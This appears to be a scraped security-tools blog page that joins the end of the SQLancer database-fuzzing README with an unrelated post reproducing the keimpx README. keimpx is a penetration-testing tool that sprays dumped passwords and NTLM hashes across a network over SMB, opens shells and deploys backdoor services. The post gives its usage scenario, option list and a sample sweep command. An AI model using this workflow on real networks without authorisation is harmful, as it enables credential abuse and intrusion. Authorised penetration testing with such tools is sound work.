java -jar sqlancer-*.jar --num-threads 4 sqlite3 --oracle NoREC

If the execution prints progress information every five seconds, then the tool works as expected. Note that SQLancer might find bugs in SQLite. Before reporting these, be sure to check that they can still be reproduced when using the latest development version. The shortcut CTRL+C can be used to terminate SQLancer manually. If SQLancer does not find any bugs, it runs indefinitely. The option --num-tries can be used to control after how many bugs SQLancer terminates. Alternatively, the option --timeout-seconds can be used to specify the maximum duration that SQLancer is allowed to run.

If you launch SQLancer without parameters, available options and commands are displayed. Note that general options that are supported by all DBMS-testing implementations (e.g., --num-threads) need to precede the name of DBMS to be tested (e.g., sqlite3). Options that are supported only for specific DBMS (e.g., --test-rtree for SQLite3), or options for which each testing implementation provides different values (e.g. --oracle NoREC) need to go after the DBMS name.


Research Prototype

This project should at this stage still be seen as a research prototype. We believe that the tool is not ready to be used. However, we have received many requests by companies, organizations, and individual developers, which is why we decided to prematurely release the tool. Expect errors, incompatibilities, lack of documentation, and insufficient code quality. That being said, we are working hard to address these issues and enhance SQLancer to become a production-quality piece of software. We welcome any issue reports, extension requests, and code contributions.


Testing Approaches
Approach Description
Pivoted Query Synthesis (PQS) PQS is the first technique that we designed and implemented. It randomly selects a row, called a pivot row, for which a query is generated that is guaranteed to fetch the row. If the row is not contained in the result set, a bug has been detected. It is fully described here. PQS is the most powerful technique, but also requires more implementation effort than the other two techniques. It is currently unmaintained.
Non-optimizing Reference Engine Construction (NoREC) NoREC aims to find optimization bugs. It is described here. It translates a query that is potentially optimized by the DBMS to one for which hardly any optimizations are applicable, and compares the two result sets. A mismatch between the result sets indicates a bug in the DBMS.
Ternary Logic Partitioning (TLP) TLP partitions a query into three partitioning queries, whose results are composed and compared to the original query's result set. A mismatch in the result sets indicates a bug in the DBMS. In contrast to NoREC and PQS, it can detect bugs in advanced features such as aggregate functions.

Please find the .bib entries here.
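
To make the TLP idea concrete, here is a hedged illustration against SQLite via Python's sqlite3 (simplified; not SQLancer's generated SQL): for a random predicate p, every row satisfies exactly one of p, NOT p, and p IS NULL under ternary logic, so the three partitions must recompose the original result set:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE t (c INTEGER)")
conn.executemany("INSERT INTO t VALUES (?)", [(1,), (2,), (None,)])

p = "c > 1"  # stands in for a randomly generated predicate
original = conn.execute("SELECT c FROM t").fetchall()
partitioned = conn.execute(
    f"SELECT c FROM t WHERE {p} "
    f"UNION ALL SELECT c FROM t WHERE NOT ({p}) "
    f"UNION ALL SELECT c FROM t WHERE ({p}) IS NULL"
).fetchall()

# A multiset mismatch between the two results indicates a logic bug.
assert sorted(original, key=repr) == sorted(partitioned, key=repr)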


Supported DBMS

Since SQL dialects differ widely, each DBMS to be tested requires a separate implementation.

DBMS Status Expression Generation Description
SQLite Working Untyped This implementation is currently affected by a significant performance regression that still needs to be investigated
MySQL Working Untyped Running this implementation likely uncovers additional, unreported bugs.
PostgreSQL Working Typed
Citus (PostgreSQL Extension) Working Typed This implementation extends the PostgreSQL implementation of SQLancer, and was contributed by the Citus team.
MariaDB Preliminary Untyped The implementation of this DBMS is very preliminary, since we stopped extending it after all but one of our bug reports were addressed. Running it likely uncovers additional, unreported bugs.
CockroachDB Working Typed
TiDB Working Untyped
DuckDB Working Untyped, Generic
ClickHouse Preliminary Untyped, Generic Implementing the different table engines was not convenient, which is why only a very preliminary implementation exists.
TDEngine Removed Untyped We removed the TDEngine implementation since all but one of our bug reports were still unaddressed five months after we reported them.

Using SQLancer

Logs

SQLancer stores logs in the target/logs subdirectory. By default, the option --log-each-select is enabled, which results in every SQL statement that is sent to the DBMS being logged. The corresponding file names are postfixed with -cur.log. In addition, if SQLancer detects a logic bug, it creates a file with the extension .log, in which the statements to reproduce the bug are logged.


Reducing a Bug

After finding a bug, it is useful to produce a minimal test case before reporting the bug, to save the DBMS developers' time and effort. For many test cases, C-Reduce does a great job. In addition, we have been working on a SQL-specific reducer, which we plan to release soon.


Found Bugs

We would appreciate it if you mention SQLancer when you report bugs found by it. We would also be excited to know if you are using SQLancer to find bugs, or if you have extended it to test another DBMS (also if you do not plan to contribute it to this project). SQLancer has found over 400 bugs in widely-used DBMS, which are listed here.


Community

We have created a Slack workspace to discuss SQLancer, and DBMS testing in general. SQLancer's official Twitter handle is @sqlancer_dbms.


Additional Documentation

Releases

Official releases are available on:


Additional Resources
  • A talk on Ternary Logic Partitioning (TLP) and SQLancer is available on YouTube.
  • An (older) Pivoted Query Synthesis (PQS) talk is available on YouTube.
  • PingCAP has implemented PQS, NoREC, and TLP in a tool called go-sqlancer.
  • More information on our DBMS testing efforts and the bugs we found is available here.


Keimpx - Check For Valid Credentials Across A Network Over SMB

22 August 2021 at 21:30
By: Zion3R


keimpx is an open source tool, released under the Apache License 2.0.

It can be used to quickly check for valid credentials across a network over SMB. Credentials can be:

  • Combination of user / plain-text password.
  • Combination of user / NTLM hash.
  • Combination of user / NTLM logon session token.

If any valid credentials are discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use. They will then be provided with an interactive SMB shell where the user can:

  • Spawn an interactive command prompt.
  • Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
  • Deploy and undeploy their own services, for instance, a backdoor listening on a TCP port for incoming connections.
  • List user details, domains, and password policy.
  • More to come, see the issues page.

Dependencies

keimpx is currently developed using Python 3.8 and makes use of the excellent Impacket library from SecureAuth Corporation for much of its functionality. keimpx also makes use of the PyCryptodome library for cryptographic functions.


Installation

To install keimpx, first install Python 3.8. On Windows, you can find the installer at this link. For Linux users, many distributions provide Python 3 and make it available via your package manager (usual package names include python3 and python).

On Linux systems, you may also need to install pip and openssl-dev using your package manager for the next step.

Once you have Python 3.8 installed, use pip to install the required dependencies using this command:

pip install -r requirements.txt

keimpx can then be executed on Linux systems by running:

./keimpx.py [options]

Or if this doesn't work:

python keimpx.py [options]
python3 keimpx.py [options]

On Windows systems, you may need to specify the full path to your Python 3.8 binary, for example:

C:\Python37\bin\python.exe keimpx.py [options]

Please ensure you use the correct path for your system, as this is only an example.


Usage

Let's say you are performing an infrastructure penetration test of a large network where you have owned a Windows workstation, escalated your privileges to Administrator or LOCAL SYSTEM, and dumped password hashes.

You also enumerated the list of machines within the Windows domain via the net command, ping sweep, ARP scan, and network traffic sniffing.

Now, what if you want to check the validity of the dumped hashes, without needing to crack them, across the whole Windows network over SMB? What if you want to log in to one or more systems using the dumped NTLM hashes, then surf the shares or even spawn a command prompt?

Fire up keimpx and let it do the work for you!

Another scenario where it comes in handy is discussed in this blog post.


Help message
keimpx 0.5.1-rc
by Bernardo Damele A. G. <[email protected]>

Usage: keimpx.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-2 (default: 0)
-t TARGET Target address
-l LIST File with list of targets
-U USER User
-P PASSWORD Password
--nt=NTHASH NT hash
--lm=LMHASH LM hash
-c CREDSFILE File with list of credentials
-D DOMAIN Domain
-d DOMAINSFILE File with list of domains
-p PORT SMB port: 139 or 445 (default: 445)
-n NAME Local hostname
-T THREADS Maximum simultaneous connections (default: 10)
-b Batch mode: do not ask to get an interactive SMB shell
-x EXECUTELIST Execute a list of commands against all hosts
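
As an illustration only (the file names and domain below are placeholders), a typical sweep of a list of hosts with a list of dumped credentials might look like:

python keimpx.py -l targets.txt -c credentials.txt -D WORKGROUP -T 20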

For examples see this wiki page.


Frequently Asked Questions

See this wiki page.


License

Copyright 2009-2020 Bernardo Damele A. G. [email protected]

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.


Contributors

Thanks to:

  • deanx - for developing polenum, from which some classes were borrowed.
  • Wh1t3Fox - for updating polenum to make it compatible with newer versions of Impacket.
  • frego - for his Windows service bind-shell executable and help with the service deploy/undeploy methods.
  • gera, beto and the rest of the SecureAuth Corporation guys - for developing such an amazing Python library and providing it with examples.
  • NEXUS2345 - for updating and maintaining keimpx.


โŒ